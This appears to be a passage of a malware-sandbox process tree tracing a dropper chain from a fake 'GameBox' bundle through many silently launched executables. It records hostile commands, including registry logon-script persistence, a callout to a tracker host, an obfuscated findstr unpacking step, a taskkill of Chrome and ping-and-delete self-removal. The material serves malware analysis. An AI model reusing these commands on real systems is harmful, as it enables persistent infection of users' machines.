                                                                      • C:\Users\Admin\AppData\Roaming\7706313.exe
                                                                        "C:\Users\Admin\AppData\Roaming\7706313.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4556
                                                                      • C:\Users\Admin\AppData\Roaming\7793887.exe
                                                                        "C:\Users\Admin\AppData\Roaming\7793887.exe"
                                                                        3⤵
                                                                          PID:4416
                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:4944
                                                                        • C:\Users\Admin\AppData\Roaming\8631307.exe
                                                                          "C:\Users\Admin\AppData\Roaming\8631307.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5092
                                                                      • C:\Users\Admin\Documents\nlf0g47LQydz6aHICGSzAK5U.exe
                                                                        "C:\Users\Admin\Documents\nlf0g47LQydz6aHICGSzAK5U.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:3208
                                                                        • C:\Users\Admin\Documents\nlf0g47LQydz6aHICGSzAK5U.exe
                                                                          "C:\Users\Admin\Documents\nlf0g47LQydz6aHICGSzAK5U.exe" -q
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          PID:2332
                                                                      • C:\Users\Admin\Documents\VqlG4eaMdZf6UGnUp4gJCuRA.exe
                                                                        "C:\Users\Admin\Documents\VqlG4eaMdZf6UGnUp4gJCuRA.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:768
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-EI3L6.tmp\VqlG4eaMdZf6UGnUp4gJCuRA.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-EI3L6.tmp\VqlG4eaMdZf6UGnUp4gJCuRA.tmp" /SL5="$10250,138429,56832,C:\Users\Admin\Documents\VqlG4eaMdZf6UGnUp4gJCuRA.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:4348
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-9TMD3.tmp\Setup.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-9TMD3.tmp\Setup.exe" /Verysilent
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            • Drops file in Program Files directory
                                                                            PID:3608
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:3336
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 820
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:7792
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 1060
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:7928
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 1116
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:4092
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 1148
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:8124
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 1180
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:7268
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 1300
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:5300
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:4024
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-ICL5G.tmp\Inlog.tmp
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-ICL5G.tmp\Inlog.tmp" /SL5="$102DA,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                PID:644
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-U44OP.tmp\Setup.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-U44OP.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                  7⤵
                                                                                    PID:7596
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-1JP3E.tmp\Setup.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-1JP3E.tmp\Setup.tmp" /SL5="$303E2,17369807,721408,C:\Users\Admin\AppData\Local\Temp\is-U44OP.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                      8⤵
                                                                                      • Loads dropped DLL
                                                                                      • Drops file in Program Files directory
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:7912
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-LVQNM.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                        9⤵
                                                                                          PID:6032
                                                                                          • C:\Windows\SysWOW64\expand.exe
                                                                                            expand C:\Users\Admin\AppData\Local\Temp\is-LVQNM.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                            10⤵
                                                                                            • Drops file in Windows directory
                                                                                            PID:4312
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                          9⤵
                                                                                            PID:6016
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                              10⤵
                                                                                                PID:7256
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                              9⤵
                                                                                                PID:6452
                                                                                              • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                9⤵
                                                                                                • Loads dropped DLL
                                                                                                PID:5656
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-LVQNM.tmp\{app}\vdi_compiler.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-LVQNM.tmp\{app}\vdi_compiler"
                                                                                                9⤵
                                                                                                  PID:8204
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-LVQNM.tmp\{app}\vdi_compiler.exe"
                                                                                                    10⤵
                                                                                                      PID:2228
                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                        ping localhost -n 4
                                                                                                        11⤵
                                                                                                        • Runs ping.exe
                                                                                                        PID:6192
                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Enumerates connected drives
                                                                                            • Modifies system certificate store
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            PID:4712
                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289445 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                              6⤵
                                                                                                PID:8340
                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1312
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-3KMPV.tmp\VPN.tmp
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-3KMPV.tmp\VPN.tmp" /SL5="$10306,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                PID:5196
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-PFENQ.tmp\Setup.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-PFENQ.tmp\Setup.exe" /silent /subid=720
                                                                                                  7⤵
                                                                                                    PID:7516
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-AI06B.tmp\Setup.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-AI06B.tmp\Setup.tmp" /SL5="$40210,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-PFENQ.tmp\Setup.exe" /silent /subid=720
                                                                                                      8⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Drops file in Program Files directory
                                                                                                      • Modifies registry class
                                                                                                      • Modifies system certificate store
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      PID:7796
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                        9⤵
                                                                                                          PID:6784
                                                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                            tapinstall.exe remove tap0901
                                                                                                            10⤵
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            PID:8460
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                          9⤵
                                                                                                            PID:8336
                                                                                                            • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                              tapinstall.exe install OemVista.inf tap0901
                                                                                                              10⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              • Drops file in Windows directory
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Modifies system certificate store
                                                                                                              PID:1936
                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                            9⤵
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:7640
                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                            9⤵
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:1360
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4672
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                                                      6⤵
                                                                                                        PID:6996
                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                          taskkill /f /im chrome.exe
                                                                                                          7⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:7580
                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3212
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-3QG24.tmp\MediaBurner2.tmp
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-3QG24.tmp\MediaBurner2.tmp" /SL5="$10320,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                        6⤵
                                                                                                          PID:5324
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-298Q7.tmp\3377047_logo_media.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-298Q7.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                            7⤵
                                                                                                              PID:4920
                                                                                                              • C:\Program Files\7-Zip\FESGUHBMZO\ultramediaburner.exe
                                                                                                                "C:\Program Files\7-Zip\FESGUHBMZO\ultramediaburner.exe" /VERYSILENT
                                                                                                                8⤵
                                                                                                                  PID:6984
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-7JTR2.tmp\ultramediaburner.tmp
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-7JTR2.tmp\ultramediaburner.tmp" /SL5="$90030,281924,62464,C:\Program Files\7-Zip\FESGUHBMZO\ultramediaburner.exe" /VERYSILENT
                                                                                                                    9⤵
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    PID:7996
                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                      10⤵
                                                                                                                        PID:6156
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\d7-ecb8e-5e4-d9289-4e75c82824120\Wileshurave.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\d7-ecb8e-5e4-d9289-4e75c82824120\Wileshurave.exe"
                                                                                                                    8⤵
                                                                                                                      PID:8124
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\spanc3h4.cbv\GcleanerEU.exe /eufive & exit
                                                                                                                        9⤵
                                                                                                                          PID:4432
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\spanc3h4.cbv\GcleanerEU.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\spanc3h4.cbv\GcleanerEU.exe /eufive
                                                                                                                            10⤵
                                                                                                                              PID:8560
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xsukxuv2.cg3\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                            9⤵
                                                                                                                              PID:8396
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\xsukxuv2.cg3\installer.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\xsukxuv2.cg3\installer.exe /qn CAMPAIGN="654"
                                                                                                                                10⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Enumerates connected drives
                                                                                                                                • Modifies system certificate store
                                                                                                                                PID:8740
                                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\xsukxuv2.cg3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\xsukxuv2.cg3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289445 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                  11⤵
                                                                                                                                    PID:8784
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qf11n1gj.ibf\ufgaa.exe & exit
                                                                                                                                9⤵
                                                                                                                                  PID:8728
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jpks3yn2.olg\anyname.exe & exit
                                                                                                                                  9⤵
                                                                                                                                    PID:2532
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jpks3yn2.olg\anyname.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jpks3yn2.olg\anyname.exe
                                                                                                                                      10⤵
                                                                                                                                        PID:8332
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jpks3yn2.olg\anyname.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\jpks3yn2.olg\anyname.exe" -q
                                                                                                                                          11⤵
                                                                                                                                            PID:5672
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ebmdgf10.hfp\gcleaner.exe /mixfive & exit
                                                                                                                                        9⤵
                                                                                                                                          PID:4632
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            10⤵
                                                                                                                                              PID:352
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ebmdgf10.hfp\gcleaner.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\ebmdgf10.hfp\gcleaner.exe /mixfive
                                                                                                                                              10⤵
                                                                                                                                                PID:7608
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hgx4lrpe.jmc\autosubplayer.exe /S & exit
                                                                                                                                              9⤵
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:7568
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\28-cb239-0ef-ac79f-a82e6c7c60810\Naejaelytaece.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\28-cb239-0ef-ac79f-a82e6c7c60810\Naejaelytaece.exe"
                                                                                                                                            8⤵
                                                                                                                                            • Checks computer location settings
                                                                                                                                            PID:7976
                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4864
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\2571189.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\2571189.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:6052
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3243041.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3243041.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                                        PID:5660
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7814738.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7814738.exe"
                                                                                                                                        6⤵
                                                                                                                                          PID:5768
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\6200429.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\6200429.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:5980
                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                                                                          5⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                          PID:5000
                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                          5⤵
                                                                                                                                            PID:4256
                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5736
                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5528
                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5760
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tmp5589_tmp.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\tmp5589_tmp.exe"
                                                                                                                                              6⤵
                                                                                                                                                PID:7076
                                                                                                                                                • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                  "C:\Windows\System32\dllhost.exe"
                                                                                                                                                  7⤵
                                                                                                                                                    PID:7620
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4256
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd
                                                                                                                                                      8⤵
                                                                                                                                                        PID:7212
                                                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                          findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                          9⤵
                                                                                                                                                            PID:4072
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                            Esplorarne.exe.com i
                                                                                                                                                            9⤵
                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            PID:7552
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                              10⤵
                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                              PID:6252
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                11⤵
                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                PID:6168
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                  12⤵
                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                  PID:5040
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                    13⤵
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    PID:6720
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                      14⤵
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                      PID:8632
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                        15⤵
                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                        PID:9192
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                          16⤵
                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                          PID:9004
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                            17⤵
                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                            PID:2880
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                              18⤵
                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                              PID:5772
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                19⤵
                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                PID:8924
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                  20⤵
                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                  PID:8156
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                    21⤵
                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                    PID:8968
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                      22⤵
                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                      PID:8224
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                        23⤵
                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                        PID:5932
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                          24⤵
                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                          PID:3536
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                            25⤵
                                                                                                                                                                                            • Drops startup file
                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                            PID:2296
                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                            ping GFBFPSXA -n 30
                                                                                                                                                            9⤵
                                                                                                                                                            • Runs ping.exe
                                                                                                                                                            PID:4464
                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    PID:5792
